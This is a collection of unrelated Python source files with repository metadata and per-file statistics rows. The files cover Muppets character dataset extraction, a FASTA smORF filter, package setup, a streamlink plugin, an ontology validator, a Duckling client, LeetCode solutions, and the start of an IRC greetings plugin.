print('%s: %d' % (character_map[i], no_of_samples))
print('total_samples: %d' % total_samples)
def extract_ground_truth(character_location_map, rest_location_map, character_id, output_path):
Path(output_path).mkdir(parents=True, exist_ok=True)
labels_file = open(output_path + 'labels.txt', 'w')
labels_file.write('txt_file, frame_id, label\n')
# write images of actual target character
print('[INFO] Start extracting images for target class: %d' % character_id)
for key, values in character_location_map.items():
video_path = video_base_path + key.split('.')[0] + '.avi'
cap = cv2.VideoCapture(video_path)
for value in values:
cap.set(cv2.CAP_PROP_POS_FRAMES, value)
ret, frame = cap.read()
if not ret:
print('Failed to read frame %d of video %r.' % (value, video_path))
labels_file.close()
exit(1)
filename = '%s/%d_%d_%d.jpg' % (output_path, file_map[key], value, character_id)
labels_file.write('%d, %d, %d\n' % (file_map[key], value, character_id))
cv2.imwrite(filename, frame)
print('[INFO] Start extracting randomly sampled images')
for key, values in rest_location_map.items():
for k, vals in values.items():
video_path = video_base_path + k.split('.')[0] + '.avi'
cap = cv2.VideoCapture(video_path)
for val in vals:
cap.set(cv2.CAP_PROP_POS_FRAMES, val)
ret, frame = cap.read()
if not ret:
print('Failed to read frame %d of video %r.' % (val, video_path))
labels_file.close()
exit(1)
filename = '%s/%d_%d_%d.jpg' % (output_path, file_map[k], val, key)
labels_file.write('%d, %d, %d\n' % (file_map[k], val, key))
cv2.imwrite(filename, frame)
labels_file.close()
def create_image_dataset_for_character(character_id, data_locations_dict, sub_path):
"""
The aim of this method is to generate a dataset for the specified character that consists of
50% images labeled with the specified character and 50% randomly sampled of all others
:param character_id: the id of the character
:param data_locations_dict: dict holding the ground truth location data
:return:
"""
character_location_map = {}
half_length = 0
for key, data_locations in data_locations_dict.items():
character_location_map[key] = data_locations[character_id]
half_length += len(data_locations[character_id])
# calculate data distribution over ground truth and per video
data_distribution_map = {}
total_samples = 0
for i in range(0, len(character_map)):
if i != character_id:
temp = {}
for key, data_locations in data_locations_dict.items():
total_samples += len(data_locations[i])
temp[key] = len(data_locations[i])
data_distribution_map[i] = temp
# calculate absolute rest distribution map
rest_data_distribution_map = {}
for key, values in data_distribution_map.items():
temp = {}
for k, v in values.items():
temp[k] = math.ceil((v / total_samples) * half_length)
rest_data_distribution_map[key] = temp
# actually do the random sampling
rest_frameid_map = {}
random.seed(333)
for key, values in rest_data_distribution_map.items():
temp = {}
for k, v in values.items():
temp[k] = random.sample(data_locations_dict[k][key], v)
# check if sample is not a positive sample, if so replace it
for idx, value in enumerate(temp[k]):
if value in data_locations_dict[k][character_id]:
tmp_fnr = random.sample(data_locations_dict[k][key], 1)[0]
while tmp_fnr in data_locations_dict[k][character_id] or tmp_fnr in temp[k]:
tmp_fnr = random.sample(data_locations_dict[k][key], 1)[0]
temp[k][idx] = tmp_fnr
rest_frameid_map[key] = temp
extract_ground_truth(character_location_map, rest_frameid_map, character_id,
ground_truth_files_base_path + sub_path)
def parse_ground_truth_txt_files(ground_truth_files):
"""
The aim of this method is to parse the ground truth from corresponding text files.
:param ground_truth_files: a list of ground truth text file paths
:return: a dictionary representing the ground truth locations
"""
parsed_ground_truth = {}
for filename in ground_truth_files:
gt = {}
with open(filename, 'r') as f:
for i, line in enumerate(f):
str_parts = line.strip().split(', ')
parts = [int(p) for p in str_parts]
for part in parts[1:]:
try:
gt[part].append(parts[0])
except KeyError:
gt[part] = [parts[0]]
parsed_ground_truth[filename.split('/')[-1]] = gt
return parsed_ground_truth
def create_mfcc_audio_dataset(audio_path, frame_length_ms, n_mfcc, output_file):
# extract counts for snippets with and without given character
total_no_audios = len(glob.glob(audio_path + '*.wav'))
print('Total number of audio snippets: %d' % total_no_audios)
print('Window size: %d ms' % frame_length_ms)
print('Number of MFCC features: %d' % n_mfcc)
print('Extracting MFCC features for audio data...')
# define fft window and sliding window factors based on given frame length
mfcc_n_fft_factor = frame_length_ms / 1000 # window factor
mfcc_hop_length_factor = mfcc_n_fft_factor * 0.5 # sliding window factor, note that this must be an int
# extract MFCC features for all audio files
mfcc_audio_data = {}
for audio_file in glob.glob(audio_path + '*.wav'):
# extract file id and character id
filename = audio_file.split('/')[-1]
file_char_id = filename.split('_')[0][-1] + '_' + filename.split('_')[1]
raw_data, sample_rate = librosa.load(audio_file)
mfccs = librosa.feature.mfcc(y=raw_data, sr=sample_rate, n_mfcc=n_mfcc,
hop_length=int(mfcc_hop_length_factor * sample_rate),
n_fft=int(mfcc_n_fft_factor * sample_rate)).T
try:
mfcc_audio_data[file_char_id].append(mfccs)
except KeyError:
mfcc_audio_data[file_char_id] = [mfccs]
# write calculated MFCCs to file
print('Write extracted MFCCs to file: %s' % output_file)
with open(output_file, 'w') as f:
for key, values in mfcc_audio_data.items():
file_id = key.split('_')[0]
char_id = key.split('_')[1]
for mfcc_array in values:
for mfcc_values in mfcc_array:
list_as_string = ','.join([str(mfcc_values[i]) for i in range(0, mfcc_array.shape[1])])
f.write('%s, %s, %s\n' % (file_id, char_id, list_as_string))
def random_sample_mfcc(target_character_id, mfcc_file):
# read the mfcc features from file
print('Read MFCC features for random sampling...')
mfcc_data_all = {0: {}, 1: {}, 2: {}, 3: {}, 4: {}}
total_number_of_samples = 0
no_positive_samples = 0
with open(mfcc_file, 'r') as f:
for i, line in enumerate(f):
parts = line.split(',')
file_id = int(parts[0].strip())
char_id = int(parts[1].strip())
mfcc_coeffs = [float(parts[i].strip()) for i in range(2, len(parts))]
if char_id == target_character_id:
no_positive_samples += 1
try:
mfcc_data_all[char_id][file_id].append(mfcc_coeffs)
except KeyError:
mfcc_data_all[char_id][file_id] = [mfcc_coeffs]
total_number_of_samples += 1
# exract the number of sample present for target character
print('Number of samples for target class %d: %d' % (target_character_id, no_positive_samples))
# calculate data distribution
print('Create data distribution map...')
data_distribution_map = {0: {}, 1: {}, 2: {}, 3: {}, 4: {}}
no_rest_samples = total_number_of_samples - no_positive_samples
for char_id, value in mfcc_data_all.items():
if char_id != target_character_id:
for file_id, mfccs in value.items():
data_distribution_map[char_id][file_id] = math.ceil(
(len(mfccs) / no_rest_samples) * no_positive_samples)
# add positive samples to resulting dataset
dataset = []
for char_id, value in mfcc_data_all.items():
if char_id == target_character_id:
for file_id, mfccs in value.items():
dataset += [(1, file_id, mfcc) for mfcc in mfccs]
# randomly sample the negative samples according to data distribution
random.seed(333)
for char_id, value in data_distribution_map.items():
for file_id, k in value.items():
dataset += [(0, file_id, mfcc) for mfcc in random.sample(mfcc_data_all[char_id][file_id], k)]
print('Successfully extracted MFCC feature dataset for character: %d' % target_character_id)
return dataset
def chunks(l, n):
for i in range(0, len(l), n):
yield l[i:i + n]
def random_sample_multi_mfcc(target_character_id, mfcc_file, audio_path, frame_length_ms, n_mfcc, mfcc_sequence_len):
# extract counts for snippets with and without given character
total_no_audios = len(glob.glob(audio_path + '*.wav'))
print('Total number of audio snippets: %d' % total_no_audios)
print('Window size: %d ms' % frame_length_ms)
print('Number of MFCC features: %d' % n_mfcc)
print('Extracting MFCC features for audio data...')
# define fft window and sliding window factors based on given frame length
mfcc_n_fft_factor = frame_length_ms / 1000 # window factor
mfcc_hop_length_factor = mfcc_n_fft_factor * 0.5 # sliding window factor, note that this must be an int
total_number_of_samples = 0
# extract MFCC features for all audio files
mfcc_audio_data = {}
for audio_file in glob.glob(audio_path + '*.wav'):
# extract file id and character id
filename = audio_file.split('/')[-1]
#file_char_id = filename.split('_')[0][-1] + '_' + filename.split('_')[1]
character_id = int(filename.split('_')[1])
raw_data, sample_rate = librosa.load(audio_file)
mfccs = librosa.feature.mfcc(y=raw_data, sr=sample_rate, n_mfcc=n_mfcc,
hop_length=int(mfcc_hop_length_factor * sample_rate),
n_fft=int(mfcc_n_fft_factor * sample_rate)).T
for mfcc_sequence in chunks(mfccs, mfcc_sequence_len):
total_number_of_samples += 1
try:
mfcc_audio_data[character_id].append(mfcc_sequence)
except KeyError:
mfcc_audio_data[character_id] = [mfcc_sequence]
no_positive_samples = len(mfcc_audio_data[target_character_id])
# exract the number of sample present for target character
print('Number of samples for target class %d: %d' % (target_character_id, no_positive_samples))
# calculate data distribution
print('Create data distribution map...')
data_distribution_map = {}
no_rest_samples = total_number_of_samples - no_positive_samples
for char_id, mfccs in mfcc_audio_data.items():
if char_id != target_character_id:
data_distribution_map[char_id] = math.ceil(
(len(mfccs) / no_rest_samples) * no_positive_samples)
# add positive samples to resulting dataset
dataset = []
for char_id, value in mfcc_audio_data.items():
if char_id == target_character_id:
for mfccs in value:
dataset.append([1, mfccs])
print(data_distribution_map)
# randomly sample the negative samples according to data distribution
random.seed(333)
for char_id, k in data_distribution_map.items():
dataset.extend([[0, mfcc] for mfcc in random.sample(mfcc_audio_data[char_id], k)])
print('Successfully extracted MFCC feature dataset for character: %d' % target_character_id)
return dataset
def get_waldorf_statler_mfcc_features(frame_length_ms, n_mfcc):
Path('../../ground_truth/audio/').mkdir(parents=True, exist_ok=True)
# check if audio snippets have alerady been extracted
if len(os.listdir('../../audio')) == 0:
extract_audio_snippets()
# if mfcc data has not been extracted, call the extraction
if len(os.listdir('../../ground_truth/audio/')) == 0:
create_mfcc_audio_dataset(audio_snippet_path, frame_length_ms, n_mfcc, mfcc_feature_file)
return random_sample_mfcc(1, mfcc_feature_file)
def get_swedish_chef_mfcc_features(frame_length_ms, n_mfcc):
Path('../../ground_truth/audio/').mkdir(parents=True, exist_ok=True)
# check if audio snippets have alerady been extracted
if len(os.listdir('../../audio')) == 0:
extract_audio_snippets()
# if mfcc data has not been extracted, call the extraction
if len(os.listdir('../../ground_truth/audio/')) == 0:
create_mfcc_audio_dataset(audio_snippet_path, frame_length_ms, n_mfcc, mfcc_feature_file)
return random_sample_mfcc(3, mfcc_feature_file)
def get_swedish_chef_multi_mfcc_features(frame_length_ms, n_mfcc, seq_len):
Path('../../ground_truth/audio/').mkdir(parents=True, exist_ok=True)
# check if audio snippets have alerady been extracted
if len(os.listdir('../../audio')) == 0:
extract_audio_snippets()
return random_sample_multi_mfcc(3, mfcc_feature_file, audio_snippet_path, frame_length_ms, n_mfcc, seq_len)
def create_kermit_image_dataset():
Path('../../ground_truth/kermit/').mkdir(parents=True, exist_ok=True)
# extract kermit image dataset if not already created
if len(os.listdir('../../ground_truth/kermit/')) == 0:
ground_truth_locations = parse_ground_truth_txt_files(ground_truth_txt_files)
print_ground_truth_statistics(ground_truth_locations)
create_image_dataset_for_character(0, ground_truth_locations, 'kermit/')
else:
print('Kermit image dataset already created.')
def create_pig_image_dataset():
Path('../../ground_truth/pig/').mkdir(parents=True, exist_ok=True)
# extract kermit image dataset if not already created
if len(os.listdir('../../ground_truth/pig/')) == 0:
ground_truth_locations = parse_ground_truth_txt_files(ground_truth_txt_files)
print_ground_truth_statistics(ground_truth_locations)
create_image_dataset_for_character(2, ground_truth_locations, 'pig/')
else:
print('Pigs image dataset already created.')
def create_swedish_chef_image_dataset():
Path('../../ground_truth/swedish_chef/').mkdir(parents=True, exist_ok=True)
# extract kermit image dataset if not already created
if len(os.listdir('../../ground_truth/swedish_chef/')) == 0:
ground_truth_locations = parse_ground_truth_txt_files(ground_truth_txt_files)
print_ground_truth_statistics(ground_truth_locations)
create_image_dataset_for_character(3, ground_truth_locations, 'swedish_chef/')
else:
print('Swedish Chef image dataset already created.')
if __name__ == '__main__':
#create_pig_image_dataset()
data = get_swedish_chef_multi_mfcc_features(20, 20, 50)
#print(data)
| 42.063882 | 117 | 0.651051 | 2,352 | 17,120 | 4.452806 | 0.108844 | 0.057768 | 0.027213 | 0.014514 | 0.675165 | 0.607849 | 0.56574 | 0.507018 | 0.498329 | 0.477227 | 0 | 0.013031 | 0.242465 | 17,120 | 406 | 118 | 42.167488 | 0.79451 | 0.141881 | 0 | 0.435252 | 0 | 0 | 0.12332 | 0.033471 | 0 | 0 | 0 | 0 | 0 | 1 | 0.05036 | false | 0 | 0.028777 | 0 | 0.100719 | 0.111511 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b5b97717666bbe9dac639046b9480144968763d | 533 | py | Python | macrel/filter_smorfs.py | celiosantosjr/macrel | b29985c282dfc4243d441f88dfc9be590a8b4fec | [
"MIT"
] | 8 | 2019-11-29T11:29:22.000Z | 2019-12-31T12:56:39.000Z | macrel/filter_smorfs.py | celiosantosjr/macrel | b29985c282dfc4243d441f88dfc9be590a8b4fec | [
"MIT"
] | null | null | null | macrel/filter_smorfs.py | celiosantosjr/macrel | b29985c282dfc4243d441f88dfc9be590a8b4fec | [
"MIT"
] | 3 | 2019-11-27T12:47:15.000Z | 2019-12-17T04:55:33.000Z | from .fasta import fasta_iter
from .utils import open_output
def filter_smorfs(ifile, ofile, uniq, full_headers=False):
'''Remove larger ORFs, leaving only smORFs behind'''
seen = set()
with open_output(ofile, mode='wt') as output:
for h,seq in fasta_iter(ifile, full_headers):
if len(seq) > 100: continue
if uniq:
if seq in seen: continue
h = 'smORF_{}'.format(len(seen))
seen.add(seq)
output.write(">{}\n{}\n".format(h,seq))
| 33.3125 | 58 | 0.58349 | 72 | 533 | 4.208333 | 0.569444 | 0.059406 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007958 | 0.292683 | 533 | 15 | 59 | 35.533333 | 0.795756 | 0.086304 | 0 | 0 | 0 | 0 | 0.039583 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0 | 0.166667 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b5b9c84e706816ce2fed253c27b0d471372eeb8 | 1,077 | py | Python | setup.py | pcjco/PyFuzzy-renamer | a8656f9d5b959a9e0d6c4e286c68e948e9cba80c | [
"MIT"
] | 2 | 2021-07-12T17:46:31.000Z | 2022-03-13T23:30:08.000Z | setup.py | pcjco/PyFuzzy-renamer | a8656f9d5b959a9e0d6c4e286c68e948e9cba80c | [
"MIT"
] | null | null | null | setup.py | pcjco/PyFuzzy-renamer | a8656f9d5b959a9e0d6c4e286c68e948e9cba80c | [
"MIT"
] | 1 | 2021-07-19T21:27:23.000Z | 2021-07-19T21:27:23.000Z | import pathlib
from setuptools import setup
README = (pathlib.Path(__file__).parent / "README.md").read_text(encoding="utf-8")
setup(
name="PyFuzzy-renamer",
version="0.2.2",
description="Uses a list of input strings and will rename each one with the most similar string from another list of strings",
long_description=README,
long_description_content_type="text/markdown",
url="https://github.com/pcjco/PyFuzzy-renamer",
author="pcjco",
author_email="pcjco@hotmail.com",
license="MIT",
classifiers=[
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
],
packages=["pyfuzzyrenamer"],
include_package_data=False,
python_requires=">=3.6",
install_requires=["wxPython>=4.1.0", "python-Levenshtein-wheels>=0.13.1", "fuzzywuzzy>=0.17.0",],
entry_points={"gui_scripts": ["pyfuzzyrenamer = pyfuzzyrenamer.__main__:main"]},
)
| 37.137931 | 130 | 0.669452 | 132 | 1,077 | 5.310606 | 0.628788 | 0.108417 | 0.142653 | 0.148359 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.027088 | 0.177344 | 1,077 | 28 | 131 | 38.464286 | 0.764108 | 0 | 0 | 0 | 0 | 0.038462 | 0.508821 | 0.056639 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.076923 | 0 | 0.076923 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b5e4de8a25563f60374824331fddc58a4af51f8 | 1,000 | py | Python | src/streamlink/plugins/reshet.py | zel4ever/streamlink | 0e48e2f01a370fa83cabc27b067b6f72cd1b8d9d | [
"BSD-2-Clause"
] | 1 | 2019-11-25T01:37:21.000Z | 2019-11-25T01:37:21.000Z | src/streamlink/plugins/reshet.py | zel4ever/streamlink | 0e48e2f01a370fa83cabc27b067b6f72cd1b8d9d | [
"BSD-2-Clause"
] | null | null | null | src/streamlink/plugins/reshet.py | zel4ever/streamlink | 0e48e2f01a370fa83cabc27b067b6f72cd1b8d9d | [
"BSD-2-Clause"
] | 1 | 2020-08-12T08:27:22.000Z | 2020-08-12T08:27:22.000Z | from __future__ import print_function
import re
from streamlink.plugin import Plugin
from streamlink.plugin.api import http
from streamlink.plugins.brightcove import BrightcovePlayer
class Reshet(Plugin):
url_re = re.compile(r"https?://(?:www\.)?reshet\.tv/(live|item/)")
video_id_re = re.compile(r'"videoID"\s*:\s*"(\d+)"')
account_id = "1551111274001"
live_channel_id = "ref:stream_reshet_live1"
@classmethod
def can_handle_url(cls, url):
return cls.url_re.match(url) is not None
def _get_streams(self):
bp = BrightcovePlayer(self.session, self.account_id)
m = self.url_re.match(self.url)
base = m and m.group(1)
if base == "live":
return bp.get_streams(self.live_channel_id)
else:
res = http.get(self.url)
m = self.video_id_re.search(res.text)
video_id = m and m.group(1)
if video_id:
return bp.get_streams(video_id)
__plugin__ = Reshet
| 28.571429 | 70 | 0.644 | 141 | 1,000 | 4.333333 | 0.41844 | 0.057283 | 0.065466 | 0.03928 | 0.042553 | 0.042553 | 0 | 0 | 0 | 0 | 0 | 0.021053 | 0.24 | 1,000 | 34 | 71 | 29.411765 | 0.782895 | 0 | 0 | 0 | 0 | 0 | 0.105 | 0.088 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.192308 | 0.038462 | 0.576923 | 0.038462 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b5f02f2b4138084c68d64e477822a03e742a7cf | 3,148 | py | Python | tools/validators/ontology_validator/yamlformat/validator/base_lib.py | richardkreid/digitalbuildings | a629c63d7d0134019637b0f6e594fa2e02c5109a | [
"Apache-2.0"
] | 1 | 2021-01-02T19:02:52.000Z | 2021-01-02T19:02:52.000Z | tools/validators/ontology_validator/yamlformat/validator/base_lib.py | richardkreid/digitalbuildings | a629c63d7d0134019637b0f6e594fa2e02c5109a | [
"Apache-2.0"
] | 1 | 2021-02-23T12:20:02.000Z | 2021-02-23T12:20:02.000Z | tools/validators/ontology_validator/yamlformat/validator/base_lib.py | richardkreid/digitalbuildings | a629c63d7d0134019637b0f6e594fa2e02c5109a | [
"Apache-2.0"
] | null | null | null | # Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the License);
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an AS IS BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Shared classes for use in objects describing ontology components.
Classes representing ontology components parsed from files should use these.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import re
import enum
import typing
# Holds the root path to the ontology and relative path to a file from the root
PathParts = typing.NamedTuple('PathParts', [('root', str),
('relative_path', str)])
GOOGLE3_REGEX = re.compile(r'^.*google3/(.*$)')
# Isolates the first segment of a typename, typically the equipment class
EQUIPMENT_CLASS_REGEX = re.compile(r'^(.*/)?([a-zA-Z]+)(_.*)*$')
GLOBAL_NAMESPACE = ''
AUTOGENERATED_TYPES = frozenset([
'AUTOGENERATED_NETWORK_DEVICE', '/AUTOGENERATED_NETWORK_DEVICE',
'HVAC/AUTOGENERATED_NETWORK_DEVICE'
])
DEPRECATED_TYPES = frozenset([
'DEPRECATED', '/DEPRECATED', 'HVAC/DEPRECATED', 'INCOMPLETE', '/INCOMPLETE',
'HVAC/INCOMPLETE'
])
class ComponentType(enum.Enum):
"""Possible component types for a folder to contain."""
SUBFIELD = 1
MULTI_STATE = 2
FIELD = 3
ENTITY_TYPE = 4
UNIT = 5
CONNECTION = 6
SUBFOLDER_NAMES = {
ComponentType.SUBFIELD: 'subfields',
ComponentType.MULTI_STATE: 'states',
ComponentType.FIELD: 'fields',
ComponentType.ENTITY_TYPE: 'entity_types',
ComponentType.UNIT: 'units',
ComponentType.CONNECTION: 'connections',
}
def HasAutogeneratedType(parent_names):
"""True if list contains an AUTOGNERATED_NETWORK_DEVICE type name.
Args:
parent_names: a list of parent names from an entity. qualified or not
"""
return AUTOGENERATED_TYPES.intersection(parent_names)
def HasDeprecatedType(parent_names):
"""True if list contains a DEPRECATED or INCOMPLETE type name.
Args:
parent_names: a list of parent names from an entity. qualified or not
"""
return DEPRECATED_TYPES.intersection(parent_names)
def GetEquipmentClass(typename):
"""Parses out the equipment class from a typename.
Args:
typename: a relative or fully qualified typename
Returns:
The equipment class string or None
"""
p_match = EQUIPMENT_CLASS_REGEX.match(typename)
if p_match:
return p_match.group(2)
return None
def GetGoogle3RelativePath(path):
"""Parses out google3 local path from an absolute path.
Args:
path: a path to a directory in google3
Returns:
the relative path to google3 with no leading / or None
"""
m = GOOGLE3_REGEX.match(path)
if m is not None:
return m.group(1)
return None
| 27.614035 | 80 | 0.729987 | 414 | 3,148 | 5.429952 | 0.408213 | 0.039146 | 0.021352 | 0.014235 | 0.118327 | 0.090747 | 0.064947 | 0.064947 | 0.064947 | 0.064947 | 0 | 0.008942 | 0.182973 | 3,148 | 113 | 81 | 27.858407 | 0.865086 | 0.473634 | 0 | 0.083333 | 0 | 0 | 0.176508 | 0.073016 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0 | 0.125 | 0 | 0.479167 | 0.020833 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b6188ad699979825125f06ce7645b9100fe4bbd | 1,320 | py | Python | duckling.py | liuzl/pyduckling | 551804b76c0a45926db9b90bb273fac00712a2fd | [
"Apache-2.0"
] | 2 | 2020-07-29T02:25:52.000Z | 2020-08-05T05:05:37.000Z | duckling.py | liuzl/pyduckling | 551804b76c0a45926db9b90bb273fac00712a2fd | [
"Apache-2.0"
] | null | null | null | duckling.py | liuzl/pyduckling | 551804b76c0a45926db9b90bb273fac00712a2fd | [
"Apache-2.0"
] | null | null | null | from os import getenv
import requests
def get_duckling_url():
url = getenv("DUCKLING_URL")
if isinstance(url, str):
return url
return "http://127.0.0.1:8000/parse"
def get_duckling_locale():
locale = getenv("DUCKLING_LOCALE")
if isinstance(locale, str):
return locale
return 'zh_CN'
def get_duckling_tz():
tz = getenv("DUCKLING_TZ")
if isinstance(tz, str):
return tz
return 'Asia/Shanghai'
class Duckling(object):
def __init__(self,
locale=get_duckling_locale(),
url=get_duckling_url(),
tz=get_duckling_tz()):
self.locale = locale
self.url = url
self.tz = tz
def __call__(self, text, locale=None, tz=None):
return self.request(text, locale, tz)
def request(self, text, locale=None, tz=None):
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
ret = requests.post(self.url, headers=headers,
data={"text":text, "locale":locale or self.locale, "tz":tz or self.tz})
if ret.status_code == 200:
return ret.json()
return []
if __name__ == "__main__":
duckling = Duckling()
text = "我打算明天下午三点去清华智源中心,可能需要开车十五公里"
ret = duckling(text)
import json
print(json.dumps(ret, ensure_ascii=False))
| 26.938776 | 87 | 0.618182 | 168 | 1,320 | 4.654762 | 0.345238 | 0.084399 | 0.053708 | 0.046036 | 0.061381 | 0.061381 | 0 | 0 | 0 | 0 | 0 | 0.013265 | 0.257576 | 1,320 | 48 | 88 | 27.5 | 0.784694 | 0 | 0 | 0 | 0 | 0 | 0.132576 | 0.045455 | 0 | 0 | 0 | 0 | 0 | 1 | 0.15 | false | 0 | 0.075 | 0.025 | 0.475 | 0.025 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b689d1bbfdd9efd839323954da20d1d8cb20d22 | 3,437 | py | Python | Widen/LC300_Longest_Increasing_Subsequence.py | crazywiden/Leetcode_daily_submit | 15637e260ab547022ac0c828dd196337bd8d50a3 | [
"MIT"
] | null | null | null | Widen/LC300_Longest_Increasing_Subsequence.py | crazywiden/Leetcode_daily_submit | 15637e260ab547022ac0c828dd196337bd8d50a3 | [
"MIT"
] | null | null | null | Widen/LC300_Longest_Increasing_Subsequence.py | crazywiden/Leetcode_daily_submit | 15637e260ab547022ac0c828dd196337bd8d50a3 | [
"MIT"
] | null | null | null | """
LC300 -- Longest Increasing Subsequence
Description:
Given an unsorted array of integers, find the length of longest increasing subsequence.
Example:
Input: [10,9,2,5,3,7,101,18]
Output: 4
Explanation: The longest increasing subsequence is [2,3,7,101], therefore the length is 4.
Note:
There may be more than one LIS combination, it is only necessary for you to return the length.
Your algorithm should run in O(n2) complexity.
Follow up: Could you improve it to O(n log n) time complexity?
"""
# dp
class Solution:
def lengthOfLIS(self, nums: List[int]) -> int:
if len(nums) == 0:
return 0
N = len(nums)
dp = [1 for _ in range(N)]
for i in range(1, N):
for j in range(i-1, -1, -1):
if nums[j] >= nums[i]:
continue
dp[i] = max(dp[i], dp[j] + 1)
return max(dp)
# credit to --> https://www.cnblogs.com/grandyang/p/4938187.html
# solutoin 1 -- dp
# time complexity -- O(N^2)
# space complexity -- O(N)
# Runtime: 1120 ms, faster than 33.91% of Python3 online submissions for Longest Increasing Subsequence.
# Memory Usage: 14 MB, less than 5.13% of Python3 online submissions for Longest Increasing Subsequence.
# dp[i] means the length of increasing subarray ends with nums[i]
# transfer formula: dp[i] = max(dp[i], dp[j] + 1) for j < i and nums[j] < nums[i]
class Solution:
def lengthOfLIS(self, nums: List[int]) -> int:
n = len(nums)
if n == 0:
return 0
dp = [1 for _ in range(n)]
res = 1
for i in range(1, n):
for j in range(i):
if nums[j] < nums[i]:
dp[i] = max(dp[i], dp[j] + 1)
res = max(dp[i], res)
return res
# solutoin 2 -- maintain a list of sorted value, use binary search(similar to np.searchsorted()) to speed up
# time complexity -- O(nlog(n))
# space complexity -- O(N)
# Runtime: 48 ms, faster than 90.47% of Python3 online submissions for Longest Increasing Subsequence.
# Memory Usage: 13.9 MB, less than 5.13% of Python3 online submissions for Longest Increasing Subsequence.
# brilliant move:
# maintain a list: records (initialized by records[0] = nums[0])
# if nums[i] < records[0], replace records[0] with nums[i]
# if nums[i] > records[-1], append nums[i] at the back of records[-1]
# else replace records[j] with nums[i] to maintain order in records
class Solution:
def lengthOfLIS(self, nums: List[int]) -> int:
def binary_search(arr, left, right, val):
if left >= right:
return right
mid = int((left + right)/2)
if arr[mid] < val:
return binary_search(arr, mid+1, right, val)
elif arr[mid] > val:
return binary_search(arr, left, mid-1, val)
else:
return mid
if len(nums) == 0:
return 0
records = [nums[0]]
for i in range(1, len(nums)):
if nums[i] > records[-1]:
records.append(nums[i])
elif nums[i] <= records[0]:
records[0] = nums[i]
else:
idx = binary_search(records, 0, len(records)-1, nums[i])
if nums[i] > records[idx]:
records[idx+1] = nums[i]
else:
records[idx] = nums[i]
return len(records)
| 36.56383 | 108 | 0.573465 | 504 | 3,437 | 3.89881 | 0.287698 | 0.043257 | 0.099746 | 0.052926 | 0.386768 | 0.335878 | 0.284987 | 0.254453 | 0.234606 | 0.165903 | 0 | 0.040825 | 0.308699 | 3,437 | 93 | 109 | 36.956989 | 0.786195 | 0.471632 | 0 | 0.307692 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0 | 0 | 0.326923 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b6bc2c11d3c80329493f0946583a595a9fe30ed | 687 | py | Python | plugins/greetings.py | Rj48/ircbot | eb4db33d8942fa1affc21ca1a8cb5ce524dde7d6 | [
"MIT"
] | null | null | null | plugins/greetings.py | Rj48/ircbot | eb4db33d8942fa1affc21ca1a8cb5ce524dde7d6 | [
"MIT"
] | 3 | 2017-06-26T18:02:13.000Z | 2017-08-22T00:27:07.000Z | plugins/greetings.py | Rj48/ircbot | eb4db33d8942fa1affc21ca1a8cb5ce524dde7d6 | [
"MIT"
] | 3 | 2017-08-01T20:11:21.000Z | 2017-08-07T18:07:20.000Z | # coding=utf-8
import random
import re
builtin_phrases = [
['hi', 'hello'],
['yo', 'sup'],
['hallo', 'tag', 'moin'],
